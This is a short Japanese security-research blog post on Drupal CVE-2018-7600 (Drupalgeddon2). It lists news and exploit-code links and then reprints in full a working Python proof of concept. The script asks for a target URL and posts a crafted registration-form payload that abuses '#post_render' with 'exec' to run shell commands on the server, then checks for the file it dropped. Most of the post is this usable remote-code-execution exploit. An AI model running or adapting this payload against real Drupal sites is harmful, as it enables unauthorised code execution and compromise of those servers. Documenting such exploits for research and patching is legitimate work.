TT Malware Log

マルウェア / サイバー攻撃 / 解析技術 に関する「個人」の調査・研究のログ

Drupal CVE-2018-7600 PoC is Public

【ニュース】

Drupal CVE-2018-7600 PoC is Public (SANS, 2018/04/13)
https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/


【Exploit Code】

◆CVE-2018-7600/exploit.py (a2u/CVE-2018-7600)
https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py

Drupal Drupalgeddon2 Remote Code Execution Ruby Port (packet storm, 2018/04/13)
https://packetstormsecurity.com/files/147182/Drupal-Drupalgeddon2-Remote-Code-Execution-Ruby-Port.html

Drupal Drupalgeddon2 Remote Code Execution (packet storm, 2018/04/13)
https://packetstormsecurity.com/files/147181/Drupal-Drupalgeddon2-Remote-Code-Execution.html

Debian Security Advisory 4156-1
https://packetstormsecurity.com/files/146953/Debian-Security-Advisory-4156-1.html


【Exploit Code】

#!/usr/bin/env
import sys
import requests

print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')

target = input('Enter target url (example: https://domain.ltd/): ')

# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
# set verify = False if your proxy certificate is self signed
# remember to set proxies both for http and https
#
# example:
# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# verify = False
proxies = {}
verify = True

url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}

r = requests.post(url, proxies=proxies, data=payload, verify=verify)
check = requests.get(target + 'hello.txt')
if check.status_code != 200:
sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')


Copyright (C) 谷川哲司 (Tetsuji Tanigawa) 1997 - 2019